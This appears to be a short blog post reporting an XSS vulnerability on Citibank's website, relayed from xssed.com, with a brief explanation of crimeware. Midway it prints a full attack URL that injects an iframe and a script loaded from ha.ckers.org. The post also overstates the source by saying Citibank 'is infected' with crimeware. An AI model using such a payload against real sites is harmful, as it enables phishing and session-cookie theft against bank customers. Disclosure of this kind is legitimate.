Citibank is not safe – new vulnerabilities

http://farm4.static.flickr.com/3088/2772069987_e61bec33bc_m.jpgRecent news from xssed.com revealed a new vulnerabilities of Citibank which is count in as worlds major bank.

What is the actual problem?

Actually due to new xss vulnerabilities its very easy for a phishers to display a Citibank phishing page until their victim’s session cookie expires or gets deleted.

Citibank.com XSS and display following link on its window:
http://www.citibank.com/domain/contact/index.htm?_u=visitor&_uid=&_profile=
“/><iframesrc=http://google.com></iframe><scriptsrc=http://ha.ckers.org/xss.js?/>
&_products=NNNNNNNNNNNNNNNNN&_ll=&_mid=&_dta=&_m=0&_cn=&_j=
&_jcontext=/US&_jfp=false&BVE=https://web.da-us.citibank.com&BVP=/cgi-bin/citifi/scripts/
&BV_UseBVCookie=yes

http://farm4.static.flickr.com/3044/2772069837_ae27a9de45_m.jpg

As discovered citibank is infected with Crimeware.For those who don’t know about crime ware-

Crimeware is a class of malware designed specifically to automate financial crime.It also often has the intent to export confidential or sensitive information from a network for financial exploitation.Crimeware can enable remote access into applications, allowing hackers to break into networks for malicious purposes.It can surreptitiously install keystroke loggers to collect sensitive data—login and password information for online bank accounts.

Our source reveals that “Both flaws can be exploited by malicious people to conduct phishing attacks with a higher success rate and to infect Citibank’s clients with crimeware.”

~shout~
“Could someone inform the authority of citibank to fix this bug”


Comments

57 responses to “Citibank is not safe – new vulnerabilities”